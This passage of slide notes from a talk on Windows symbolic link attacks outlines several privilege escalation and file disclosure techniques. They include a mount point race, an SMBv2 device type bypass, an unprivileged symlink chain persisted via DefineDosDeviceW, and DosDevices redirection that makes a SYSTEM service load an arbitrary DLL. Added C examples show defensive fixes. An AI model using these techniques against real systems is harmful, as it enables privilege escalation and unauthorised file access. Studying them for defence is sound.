    ○ Shell SHParseDisplayName accesses each directory in path
    ○ GetLongPathName or GetShortPathName
    ○ FindFirstFile/FindNextFile
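The defensive counterpart to the loader on slide 47, as an added example that is not from the talk and not the Task Scheduler's own code: the check and the use share one open handle, the open refuses a link at the final component, and the canonical content is written back through that same handle, so a mount point swapped underneath the path after the open (the race in the slides above) no longer redirects the write. It is written as portable POSIX C so it builds anywhere; on Windows the same shape is a single CreateFile/NtOpenFile handle, opened while impersonating the caller, reused for both the hash and the rewrite. The function names, the FNV-1a placeholder hash and the sample task content are assumptions made for the example.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

enum task_result { TASK_UNCHANGED, TASK_REWRITTEN, TASK_REFUSED, TASK_IO_ERROR };

/* Placeholder for whatever Hash_File really uses: FNV-1a 64, streamable so the
 * file can be hashed in chunks straight from the handle (assumption). */
#define FNV1A64_INIT 0xcbf29ce484222325ull
uint64_t fnv1a64_update(uint64_t h, const uint8_t *p, size_t n)
{
    for (size_t i = 0; i < n; i++) { h ^= p[i]; h *= 0x100000001b3ull; }
    return h;
}
uint64_t fnv1a64(const uint8_t *p, size_t n) { return fnv1a64_update(FNV1A64_INIT, p, n); }

/* Open the task file exactly once. O_NOFOLLOW refuses a link at the final
 * component, and fstat on the handle (never stat on the path) confirms it is a
 * plain regular file. Returns -1 if anything looks wrong. */
int open_task_file(const char *path)
{
    int fd = open(path, O_RDWR | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0) return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) { close(fd); return -1; }
    return fd;
}

/* Check and use through the same handle: hash what fd refers to and, on a
 * mismatch, rewrite the canonical task body through that same fd. The path is
 * never re-resolved, so changing where a directory points after the open (the
 * mount point swap in the race above) cannot redirect the rewrite. */
enum task_result verify_or_rewrite(int fd, uint64_t expected,
                                   const uint8_t *canonical, size_t canonical_len)
{
    uint8_t buf[4096];
    uint64_t h = FNV1A64_INIT;
    ssize_t n;
    if (lseek(fd, 0, SEEK_SET) < 0) return TASK_IO_ERROR;
    while ((n = read(fd, buf, sizeof buf)) > 0) h = fnv1a64_update(h, buf, (size_t)n);
    if (n < 0) return TASK_IO_ERROR;
    if (h == expected) return TASK_UNCHANGED;

    if (ftruncate(fd, 0) != 0 || lseek(fd, 0, SEEK_SET) < 0) return TASK_IO_ERROR;
    for (size_t done = 0; done < canonical_len; ) {
        ssize_t w = write(fd, canonical + done, canonical_len - done);
        if (w <= 0) return TASK_IO_ERROR;
        done += (size_t)w;
    }
    return TASK_REWRITTEN;
}

/* Handle-based replacement for Load_Task_File on slide 47 (name assumed). */
enum task_result load_task_file(const char *path, uint64_t expected,
                                const uint8_t *canonical, size_t canonical_len)
{
    int fd = open_task_file(path);
    if (fd < 0) return TASK_REFUSED;
    enum task_result r = verify_or_rewrite(fd, expected, canonical, canonical_len);
    close(fd);
    return r;
}
```

Note that O_NOFOLLOW only refuses a link at the last path component; a link or mount point higher up the path is still followed by the open, which is exactly why the one-handle rule, not the path check, is what closes the race.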
• 58. NTFS Symbolic Links
• 59. Structure of a Symbolic Link

        typedef struct _SYMLINK_REPARSE_BUFFER {
            // Header
            ULONG  ReparseTag;            // Set to 0xA000000C for Symlink
            USHORT ReparseDataLength;
            USHORT Reserved;
            // Reparse Data
            USHORT SubstituteNameOffset;
            USHORT SubstituteNameLength;
            USHORT PrintNameOffset;
            USHORT PrintNameLength;
            ULONG  Flags;                 // 0 - Absolute path, 1 - Relative path
            WCHAR  PathBuffer[1];
        } SYMLINK_REPARSE_BUFFER;
• 60. Create Symlink Privilege: Admin user - Yay! Normal user - Boo :-(
• 61-62. Create Symbolic Link Privilege

        NTSTATUS NtfsSetReparsePoint(NTFS_CREATE_CONTEXT* ctx) {
            // Validation ...
            PREPARSE_DATA_BUFFER reparse_buf;
            if ((reparse_buf->ReparseTag == IO_REPARSE_TAG_MOUNT_POINT) &&
                (ctx->Type != FILE_DIRECTORY)) {
                return STATUS_NOT_A_DIRECTORY;
            }
            // Context must contain the 0x400 flag
            if ((reparse_buf->ReparseTag == IO_REPARSE_TAG_SYMLINK) &&
                ((ctx->Flags & 0x400) == 0)) {
                return STATUS_ACCESS_DENIED;
            }
            // ...
        }
• 63. Flags Setting

        NTSTATUS NtfsSetCcbAccessFlags(NTFS_FILE_CONTEXT* ctx) {
            ACCESS_MODE AccessMode = NtfsEffectiveMode();
            if (ctx->HasRestorePrivilege) {
                ctx->Flags |= 0x400;
            }
            if (AccessMode == KernelMode ||
                SeSinglePrivilegeCheck(&SeCreateSymbolicLinkPrivilege, &security_ctx, UserMode)) {
                ctx->Flags |= 0x400;
            }
            // ...
        }
• 64. Hypothetical Scenario (the driver returns the handle to a user mode process)

        NTSTATUS Handle_OpenLog(PIRP Irp) {
            OBJECT_ATTRIBUTES objattr;
            UNICODE_STRING name;
            RtlInitUnicodeString(&name, L"\\SystemRoot\\LogFiles\\user.log");
            InitializeObjectAttributes(&objattr, &name, 0, NULL, NULL);
            PHANDLE Handle = Irp->AssociatedIrp.SystemBuffer;
            return ZwCreateFile(Handle, &objattr, ...);
        }
• 65. SMBv2 Symbolic Links: https://msdn.microsoft.com/en-us/library/cc246542.aspx
• 66. SMBv2 Symbolic Link Restrictions
  ● Remote to Local would be useful
  ● Disabled by default in local security policy
• 67. Back to IopParseDevice (enforces symlink traversal based on device types)

        enum SymlinkDeviceType { Local, Network };

        if (ctx->ReparseTag == IO_REPARSE_TAG_MOUNT_POINT) {
            // ...
        } else {
            SymlinkDeviceType target_type = GetSymlinkDeviceType(TargetDeviceType);
            if (target_type == Local || target_type == Network) {
                if (!NT_SUCCESS(IopSymlinkEnforceEnabledTypes(
                        target_type, ctx->last_target_type))) {
                    return STATUS_IO_REPARSE_DATA_INVALID;
                }
            }
        }
• 68. MRXSMB20 (no check on ReparseTag)

        NTSTATUS Smb2Create_Finalize(SMB_CONTEXT* ctx) {
            // Make request and get response
            if (RequestResult == STATUS_STOPPED_ON_SYMLINK) {
                // Validates the buffer layout only; the ReparseTag is not checked
                result = FsRtlValidateReparsePointBuffer(
                    ctx->ErrorData, ctx->ErrorDataLength);
                if (!NT_SUCCESS(result)) {
                    return result;
                }
            }
            // ...
        }
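A user-mode validator for the layout on slide 59, as an added example that is not from the talk and not Windows' own code: it performs the header, offset and length checks that FsRtlValidateReparsePointBuffer is responsible for and adds the tag whitelist that slide 68 notes MRXSMB20 does not apply, so a server answering STATUS_STOPPED_ON_SYMLINK with a mount point tag is refused when only symlinks are expected. It is portable C with the Windows types spelled out locally; the function names and the sample buffers are assumptions, and Flags is read as the 4-byte ULONG of the real REPARSE_DATA_BUFFER.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Tag values from the Windows SDK; the layout follows REPARSE_DATA_BUFFER. */
#define IO_REPARSE_TAG_MOUNT_POINT 0xA0000003u
#define IO_REPARSE_TAG_SYMLINK     0xA000000Cu
#define SYMLINK_FLAG_RELATIVE      0x00000001u  /* Flags: 0 absolute, 1 relative */

#define REPARSE_HDR_LEN   8u   /* ReparseTag + ReparseDataLength + Reserved */
#define SYMLINK_FIXED_LEN 12u  /* four USHORT offsets/lengths + ULONG Flags */
#define MOUNT_FIXED_LEN   8u   /* four USHORT offsets/lengths, no Flags */

typedef struct {
    uint32_t tag;
    uint32_t flags;                /* symlink only; 0 for mount points */
    uint16_t sub_off, sub_len;     /* byte offset/length inside PathBuffer */
    uint16_t print_off, print_len;
    const uint8_t *path;           /* PathBuffer: UTF-16LE, not NUL terminated */
    size_t path_len;               /* bytes available in PathBuffer */
} reparse_view;

enum reparse_status { REPARSE_OK, REPARSE_TOO_SHORT, REPARSE_BAD_LENGTH,
                      REPARSE_BAD_TAG, REPARSE_BAD_RANGE };

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | ((uint32_t)rd16(p + 2) << 16); }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { wr16(p, (uint16_t)v); wr16(p + 2, (uint16_t)(v >> 16)); }

/* Validate a reparse buffer of len bytes. When allowed_tags is non-empty the
 * tag must be in that list: the check slide 68 notes MRXSMB20 does not make. */
enum reparse_status parse_reparse(const uint8_t *buf, size_t len,
                                  const uint32_t *allowed_tags, size_t n_allowed,
                                  reparse_view *out)
{
    if (len < REPARSE_HDR_LEN) return REPARSE_TOO_SHORT;
    uint32_t tag = rd32(buf);
    uint16_t data_len = rd16(buf + 4);
    if (REPARSE_HDR_LEN + (size_t)data_len > len) return REPARSE_BAD_LENGTH;

    size_t fixed;
    if (tag == IO_REPARSE_TAG_SYMLINK) fixed = SYMLINK_FIXED_LEN;
    else if (tag == IO_REPARSE_TAG_MOUNT_POINT) fixed = MOUNT_FIXED_LEN;
    else return REPARSE_BAD_TAG;
    if (n_allowed) {
        size_t i = 0;
        while (i < n_allowed && allowed_tags[i] != tag) i++;
        if (i == n_allowed) return REPARSE_BAD_TAG;
    }
    if (data_len < fixed) return REPARSE_BAD_LENGTH;

    const uint8_t *body = buf + REPARSE_HDR_LEN;
    reparse_view v;
    v.tag = tag;
    v.sub_off = rd16(body);       v.sub_len = rd16(body + 2);
    v.print_off = rd16(body + 4); v.print_len = rd16(body + 6);
    v.flags = (tag == IO_REPARSE_TAG_SYMLINK) ? rd32(body + 8) : 0;
    v.path = body + fixed;
    v.path_len = data_len - fixed;
    /* Names are UTF-16: offsets and lengths must be even and stay inside PathBuffer. */
    if ((v.sub_off | v.sub_len | v.print_off | v.print_len) & 1) return REPARSE_BAD_RANGE;
    if ((size_t)v.sub_off + v.sub_len > v.path_len ||
        (size_t)v.print_off + v.print_len > v.path_len) return REPARSE_BAD_RANGE;
    if (out) *out = v;
    return REPARSE_OK;
}

/* Copy the substitute (substitute != 0) or print name out as ASCII for logging;
 * code units above 0x7F become '?'. Returns the number of characters written. */
size_t reparse_name_ascii(const reparse_view *v, int substitute, char *dst, size_t cap)
{
    uint16_t off = substitute ? v->sub_off : v->print_off;
    uint16_t len = substitute ? v->sub_len : v->print_len;
    size_t n = 0;
    for (uint16_t i = 0; i < len && n + 1 < cap; i += 2) {
        uint16_t u = rd16(v->path + off + i);
        dst[n++] = (u < 0x80) ? (char)u : '?';
    }
    if (cap) dst[n] = '\0';
    return n;
}

/* Encoder used only to construct the sample buffers (ASCII names in, UTF-16LE
 * out). Returns the total size in bytes, or 0 if dst is too small. */
size_t build_reparse(uint8_t *dst, size_t cap, uint32_t tag, uint32_t flags,
                     const char *substitute, const char *print)
{
    size_t fixed = (tag == IO_REPARSE_TAG_SYMLINK) ? SYMLINK_FIXED_LEN : MOUNT_FIXED_LEN;
    size_t sl = strlen(substitute), pl = strlen(print);
    size_t data_len = fixed + 2 * (sl + pl);
    if (data_len > 0xFFFF || REPARSE_HDR_LEN + data_len > cap) return 0;
    wr32(dst, tag); wr16(dst + 4, (uint16_t)data_len); wr16(dst + 6, 0);
    uint8_t *body = dst + REPARSE_HDR_LEN;
    wr16(body, 0);                      wr16(body + 2, (uint16_t)(2 * sl));
    wr16(body + 4, (uint16_t)(2 * sl)); wr16(body + 6, (uint16_t)(2 * pl));
    if (tag == IO_REPARSE_TAG_SYMLINK) wr32(body + 8, flags);
    uint8_t *p = body + fixed;
    for (size_t i = 0; i < sl; i++) wr16(p + 2 * i, (uint8_t)substitute[i]);
    for (size_t i = 0; i < pl; i++) wr16(p + 2 * sl + 2 * i, (uint8_t)print[i]);
    return REPARSE_HDR_LEN + data_len;
}
```

The allowed-tag list is what makes the difference for the SMBv2 case on the following slides: a client that only ever expects IO_REPARSE_TAG_SYMLINK from a remote server passes just that tag and rejects a mount point before IopParseDevice ever sees it.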
• 69-71. SMBv2 Device Type Bypass (NtOpenFile → ObpLookupObjectName → IopParseDevice → SMB2 Driver)
  1. Parsing name \\server\share\file: the current component is the server, and the SMB2 driver sends Create \share\file to the server
  2. The server answers STATUS_STOPPED_ON_SYMLINK with IO_REPARSE_TAG_MOUNT_POINT; the SMB2 driver returns STATUS_REPARSE to IopParseDevice
  3. The parsing name is now \??\C:\hello.txt, which is handed to the NTFS driver
• 72. DEMO: SMBv2 Local File Disclosure in IE
• 73. File Symbolic Links - Without Permissions
• 74. First Try: the default CreateFile call won’t open the file, it returns Access Denied
• 76. The NtCreateFile Paradox
  ● FILE_DIRECTORY_FILE flag
  ● FILE_NON_DIRECTORY_FILE flag
  ● Neither FILE_DIRECTORY_FILE nor FILE_NON_DIRECTORY_FILE
• 77. The Old ADS Directory Trick: using the $INDEX_ALLOCATION stream will bypass the initial directory failure
• 78-80. Let Our Powers Combine (NtOpenFile → ObpLookupObjectName → IopParseDevice)
  1. Parsing name \??\C:\temp\mylink: the NTFS driver hits the mount point and returns STATUS_REPARSE with \RPC Control\mylink
  2. Parsing name \RPC Control\mylink: ObpParseSymbolicLink returns STATUS_REPARSE with \??\C:\hello.txt
• 81. Persisting the Symlink
  ● Might be useful to persist the symlink between login sessions
  ● Can’t pass OBJ_PERMANENT directly
    ○ Needs SeCreatePermanentPrivilege
  ● Get CSRSS to do it for us :-)

        DefineDosDeviceW(
            DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH,
            L"GLOBALROOT\\RPC Control\\mylink",
            L"TargetPath"
        );
• 82. Combined Symbolic Link Limitations
  ● All existing limitations of Mount Points apply
  ● Vulnerable application can’t try to list or inspect the mount point itself
    ○ Listing the directory
    ○ Open for GetFileAttributes or similar
  ● Can mitigate somewhat by clever tricks with oplocks on directory hierarchy
• 86-88. DosDevice Prefix: THE PREFIX IS A LIE
  \??\c:\somepath → \Sessions\0\DosDevices\X-Y\c:\somepath → \GLOBAL??\c:\somepath
• 90. Windows User Impersonation
• 91-94. Very Exploitable Behaviour

        void ExploitableFunction() {
            ImpersonateLoggedOnUser(hToken);
            LoadLibrary("c:\\secure.dll");
            RevertToSelf();
        }

  While impersonating, the path resolves as:
  c:\secure.dll → \??\c:\secure.dll → \Sessions\0\DosDevices\X-Y\c:\secure.dll → c:\somearbitrary.dll
• 95. Very Exploitable Behaviour

        void ExploitableFunction() {
            ImpersonateLoggedOnUser(hToken);
            LoadLibrary("secure.dll");
            RevertToSelf();
        }

        void COMExploitableFunction() {
            ImpersonateLoggedOnUser(hToken);
            CoCreateInstance(CLSID_SecureObject, ...);
            RevertToSelf();
        }
• 96. Finding an Ideal Service

    Requirement                       Spooler Service
    Runs as NT AUTHORITY\SYSTEM       Yup
    Uses impersonation                Definitely
    Accessible by normal user         Kind of the point
    Has a habit of loading DLLs       Think of all the printer drivers
• 98. Links and References
  ● Symlink Testing Tools: https://github.com/google/symboliclink-testing-tools
  ● File Test Application: https://github.com/ladislav-zezula/FileTest